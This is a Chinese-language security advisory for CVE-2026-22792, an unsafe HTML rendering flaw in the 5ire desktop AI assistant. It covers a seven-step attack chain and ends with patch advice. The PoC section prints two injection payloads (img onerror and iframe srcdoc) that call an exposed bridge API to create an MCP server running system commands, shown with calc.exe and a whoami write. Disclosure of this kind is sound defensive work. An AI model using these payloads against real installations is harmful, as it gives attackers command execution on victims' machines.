CVE-2026-22792: 5ire桌面AI助手不安全HTML渲染导致远程代码执行

漏洞信息

漏洞编号

CVE-2026-22792

漏洞类型

远程代码执行

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

5ire

漏洞概述

5ire是一款跨平台桌面人工智能助手和模型上下文协议（MCP）客户端。在0.15.3之前的版本中，存在不安全HTML渲染漏洞，允许不受信任的HTML内容（包括on*事件属性）在渲染器上下文中执行。攻击者可以通过注入恶意HTML标签（如<img>标签配合onerror事件处理器）来执行任意JavaScript代码，进而调用暴露的桥接API接口。该漏洞可导致攻击者未经授权创建MCP服务器，并最终实现远程命令执行。由于CVSS评分高达9.6，属于严重级别漏洞，对使用受影响版本的用户构成重大安全威胁。建议所有用户立即升级到0.15.3或更高版本以修复此安全问题。

技术细节

该漏洞的根本原因在于5ire应用程序的HTML渲染器未对用户输入进行充分的HTML转义和过滤。具体来说，渲染器允许HTML标签的on*事件属性（如onerror、onclick、onload等）被解析和执行。攻击者可以构造包含恶意事件处理器的HTML payload，例如使用<img>标签的onerror属性来触发JavaScript代码执行。一旦恶意JavaScript在渲染器上下文中运行，它可以通过window.bridge对象调用暴露的原生API，如mcpServersManager.createServer等关键功能。这些桥接API原本设计用于合法的MCP服务器管理功能，但由于缺乏适当的权限验证和输入过滤，被恶意JavaScript滥用后可以用于创建任意的MCP服务器配置，最终导致攻击者可以在受害系统上执行任意系统命令。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标用户正在使用5ire桌面应用程序，版本低于0.15.3

STEP 2

步骤2: 构造恶意Payload

攻击者构造包含onerror事件处理器的HTML payload，如<img src=x onerror='恶意JS代码'>

STEP 3

步骤3: 注入恶意HTML

通过应用的输入字段、聊天界面或任何支持HTML渲染的功能点注入恶意HTML内容

STEP 4

步骤4: 触发JavaScript执行

当应用渲染该HTML时，onerror事件被触发，恶意JavaScript代码在渲染器上下文中执行

STEP 5

步骤5: 调用桥接API

恶意JS通过window.bridge对象调用暴露的mcpServersManager.createServer等API

STEP 6

步骤6: 创建恶意MCP服务器

利用createServer API创建配置为执行任意系统命令的MCP服务器

STEP 7

步骤7: 远程命令执行

MCP服务器执行攻击者指定的系统命令，实现对受害者主机的远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-22792 PoC - 5ire Unsafe HTML Rendering RCE
// This PoC demonstrates the injection of malicious HTML with onerror event handler
// to execute arbitrary JavaScript and call exposed bridge APIs

const pocPayload = `
<img src=x onerror="
  // Step 1: Execute arbitrary JavaScript in renderer context
  console.log('Exploiting CVE-2026-22792');
  
  // Step 2: Call exposed bridge API to create unauthorized MCP server
  try {
    window.bridge.mcpServersManager.createServer({
      name: 'malicious_server',
      command: 'cmd.exe',
      args: ['/c', 'calc.exe'],  // Example: Launch calculator
      env: {}
    });
    console.log('MCP server created successfully - RCE achieved');
  } catch(e) {
    console.error('Exploitation failed:', e);
  }
">
`;

// Alternative PoC using iframe with srcdoc
const alternativePoc = `
<iframe srcdoc='
  <script>
    // Call bridge API for remote command execution
    window.bridge.mcpServersManager.createServer({
      name: 'pwned',
      command: '/bin/bash',
      args: ['-c', 'whoami > /tmp/pwned.txt'],
      env: {}
    });
  </script>
'></iframe>
`;

// This payload would be injected into the 5ire application's
// input field or chat interface that renders HTML content

影响范围

5ire < 0.15.3

防御指南

临时缓解措施

立即将5ire应用程序升级到0.15.3或更高版本。在升级前，应限制应用程序的网络访问权限，避免访问不可信的网站或点击来源不明的链接，同时启用浏览器的安全防护功能。对于企业用户，建议通过终端防护软件监控应用程序的网络行为，及时发现异常活动。